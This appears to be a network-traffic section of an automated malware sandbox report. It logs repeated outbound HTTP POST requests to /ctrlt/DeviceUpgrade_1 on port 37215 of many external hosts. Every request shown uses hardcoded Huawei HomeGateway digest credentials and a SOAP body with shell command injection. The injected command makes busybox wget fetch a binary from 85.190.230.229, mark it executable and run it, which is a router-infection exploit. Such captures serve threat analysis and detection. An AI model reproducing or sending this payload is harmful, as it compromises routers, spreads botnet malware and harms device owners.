                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      87192.168.2.1439334197.177.145.2437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.982986927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.318109035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802081108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794064045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746073961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681794882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617482901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.232913971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999571085 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      88192.168.2.144904641.40.148.18337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.984143019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      89192.168.2.146005241.11.159.9637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.985471010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
